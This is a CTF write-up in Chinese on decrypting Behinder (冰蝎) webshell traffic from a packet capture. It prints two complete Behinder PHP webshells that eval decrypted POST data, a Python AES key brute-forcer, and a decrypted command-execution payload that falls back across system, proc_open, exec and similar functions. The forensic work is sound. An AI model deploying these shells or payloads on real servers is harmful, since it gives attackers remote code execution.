思路

题目就很明显了,是分析冰蝎流量,我做冰蝎有两种思路

1、找上传的冰蝎马,直接发现key

2、爆破返回包得到key(最无脑且有效的方法)

v4.0的马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
@error_reporting(0);
    function decrypt($data)
{
    $key="25f9e794323b4538"; 
    $bs="base64_"."decode";
    $after=$bs($data."");
    for($i=0;$i<strlen($after);$i++) {
        $after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
    $post=Decrypt(file_get_contents("php://input"));
    eval($post);
?>

v3.0的马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

wp

先导出http对象,搜一下key,看看能不能直接得到key

image-20230809090705987

冰蝎马的特征是传输的时候没有明文传输,全是密文,这都是加密以后的数据,第一种思路无效,我们采取第二种爆破的思路

1
http.response.code!=404 && data-text-lines

image-20230809090924309

因为结尾有magic字符,是冰蝎4+aes_with_magic的特征

image-20230809091016463

爆破得到key

1
2
3
4
[2023-08-09 09:09:07] 开始爆破, 线程数: 32.
Find Password: hunting, AES key: fb59891768280222, Message: b'{"status":"c3VjY2Vzcw==","msg":""}'
Find Password: 128500, AES key: 9df84a402611ff0b, Message: b'\xe6\xe9j\xfe2\x833\xaeT\x04\xfa\xc6\xad\xdb\xb5(OF\xe9\x06\x07\x85c\xbb)M\x12\xbdV\xff\x94\xf8\x9b.\x19\x1e\x82\xef}\xd4\xcb\xd3\x80\xa2\x97d0'
[2023-08-09 09:09:07] BruteForceAES执行完毕!

接下来就是把每个包都还原

1
2
http and urlencoded-form
http.response.code!=404 && data-text-lines

最后在2190包里发现flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import re
import base64
import hashlib
from Crypto.Cipher import AES

class AESCracker:
    def __init__(self, encrypted_data):
        self.encrypted_data = encrypted_data

    @staticmethod
    def decrypt(key, data):
        magic_num = int(key[:2], 16) % 16
        data = data[:len(data) - magic_num]

        cipher = AES.new(key, AES.MODE_ECB)
        decoded_bytes = base64.b64decode(data)
        return cipher.decrypt(decoded_bytes).decode('utf-8')

    def key_brute(self):
        with open(r"D:\CTF\Misc\Byxs20\CTF_Script\BruteForceAES\wordlists\Byxs20_top2w5.txt", 'rb') as f:
            plain = [i.strip() for i in f.readlines()]
        for key_candidate in plain:
            md5_enc = hashlib.md5(key_candidate).hexdigest()
            try:
                key = md5_enc[:16].encode()
                decrypted_data = self.decrypt(key, self.encrypted_data)
                cmd = re.findall(r'\$cmd="(.*?)"', decrypted_data)
                if cmd:
                    print(decrypted_data)
                    print('[*] Crack Success!!!' + '\n' + '[*] Key: ' + key_candidate.decode('utf-8') + '\n[*] Webshell Key: ' + md5_enc[:16])
                    payload = base64.b64decode(cmd[0]).decode('utf-8')
                    print('[*] Payload: ' + payload)
                break
            except Exception as e:
                print('[-] Crack Failed')

    def main(self, key=None):
        if key:
            try:
                decrypted_data = self.decrypt(key.encode(), self.encrypted_data)
                print('[*] Decrypted Data:\n' + decrypted_data)
            except Exception as e:
                print('[-] Decryption Failed')
        else:
            self.key_brute()

if __name__ == '__main__':
    encrypted_data = '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····A······'
    aes_cracker = AESCracker(encrypted_data)
    aes_cracker.main('')  # Provide the key here

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result));
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result));
}


    function Encrypt($data)
    {
        $key="fb59891768280222"; //璇ュ瘑閽ヤ负杩炴帴瀵嗙爜32浣峬d5鍊肩殑鍓�16浣嶏紝榛樿杩炴帴瀵嗙爜rebeyond
        $encrypted=base64_encode(openssl_encrypt($data, "AES-128-ECB", $key,OPENSSL_PKCS1_PADDING));
        $magicNum=hexdec(substr($key,0,2))%16; //鏍规嵁瀵嗛挜鍔ㄦ�佺‘瀹氶瓟娉曞熬宸寸殑闀垮害
        for($i=0;$i<$magicNum;$i++)
        {
            $encrypted=$encrypted.chr(mt_rand(0, 255)); //鎷兼帴榄旀硶灏惧反
        }
        return $encrypted;
    }
$cmd="Y2QgL3Zhci93d3cvaHRtbC9zenpnLyA7ZWNobyBmbGFnezQwNGM2MDFhOGNhOWQ0NGQ1ODZmN2I5M2JhMjM2YjEyfSA+IGZsYWc=";$cmd=base64_decode($cmd);$path="L3Zhci93d3cvaHRtbC9zenpnLw==";$path=base64_decode($path);
main($cmd,$path);
[*] Crack Success!!!
[*] Key: hunting
[*] Webshell Key: fb59891768280222
[*] Payload: cd /var/www/html/szzg/ ;echo flag{404c601a8ca9d44d586f7b93ba236b12} > flag